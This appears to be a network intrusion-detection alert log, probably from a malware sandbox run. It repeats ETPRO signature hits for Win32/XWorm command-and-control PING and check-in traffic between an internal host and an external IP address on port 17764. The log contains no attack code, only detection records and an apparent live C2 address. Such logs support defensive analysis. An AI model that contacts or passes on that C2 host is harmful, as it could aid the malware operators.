                                                                                        2024-10-13T19:10:18.466044+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21147.185.221.231764192.168.2.550002TCP
                                                                                        2024-10-13T19:10:18.547331+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:18.547331+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:18.656869+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:18.656869+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:18.766303+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:18.766303+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:18.883111+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:18.883111+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:18.984954+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:18.984954+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:19.094263+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:19.094263+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:19.203672+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:19.203672+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:19.313245+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:19.313245+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:19.422488+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:19.422488+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:19.531810+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:19.531810+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:19.641208+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:19.641208+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:19.754672+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:19.754672+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:19.906384+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:19.906384+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:19.929995+02002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.550002147.185.221.231764TCP
                                                                                        2024-10-13T19:10:20.020435+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:20.020435+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:20.146821+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:20.146821+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:20.250635+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:20.250635+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:20.273606+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.231764192.168.2.550002TCP
                                                                                        2024-10-13T19:10:20.275420+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550002147.185.221.231764TCP
                                                                                        2024-10-13T19:10:20.359975+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:20.359975+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:20.475752+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:20.475752+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:20.578733+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:20.578733+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:20.688627+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:20.688627+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:20.797421+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:20.797421+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:20.907327+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:20.907327+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:21.016390+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:21.016390+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:21.322396+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:21.322396+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:21.438037+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:21.438037+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:21.547493+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:21.547493+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:21.656787+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:21.656787+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:21.766218+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:21.766218+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:21.875705+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:21.875705+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:21.985119+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:21.985119+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:22.094395+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:22.094395+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:22.203753+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:22.203753+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:22.313246+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:22.313246+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:22.423146+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:22.423146+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:22.534177+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:22.534177+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:22.641319+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:22.641319+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:22.750749+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:22.750749+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:22.862206+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:22.862206+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:22.969318+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:22.969318+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:23.079072+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:23.079072+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:23.188200+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:23.188200+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:23.297392+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:23.297392+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:23.412850+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:23.412850+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:23.531938+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:23.531938+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:23.641148+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:23.641148+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:23.750876+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:23.750876+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:23.865113+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:23.865113+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:24.034558+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:24.034558+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:24.142796+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:24.142796+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:24.251143+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:24.251143+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:24.360109+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:24.360109+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:24.688174+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:24.688174+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:24.797597+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:24.797597+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:24.907070+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:24.907070+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:25.016320+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:25.016320+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:25.125843+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:25.125843+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:25.235085+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:25.235085+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:25.344688+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:25.344688+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:25.453565+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:25.453565+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:25.563222+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:25.563222+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:25.672740+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:25.672740+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:25.797299+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:25.797299+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:25.907191+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:25.907191+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:26.016148+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:26.016148+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:26.386871+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:26.386871+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:26.656496+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:26.656496+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:26.774530+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:26.774530+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:26.891179+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:26.891179+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:27.001058+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:27.001058+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:27.110190+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:27.110190+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:27.225738+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:27.225738+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:27.328633+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:27.328633+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:27.441793+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:27.441793+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:27.563602+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:27.563602+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:27.672557+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:27.672557+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:27.785245+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:27.785245+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:27.893044+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:27.893044+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:28.001761+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:28.001761+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:28.112394+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:28.112394+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:28.231497+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:28.231497+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:28.344338+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:28.344338+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:28.454492+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:28.454492+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:28.567769+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:28.567769+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:28.676054+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:28.676054+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:28.782045+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:28.782045+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:28.893427+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:28.893427+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:29.008754+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:29.008754+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:29.194886+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:29.194886+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:30.257087+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
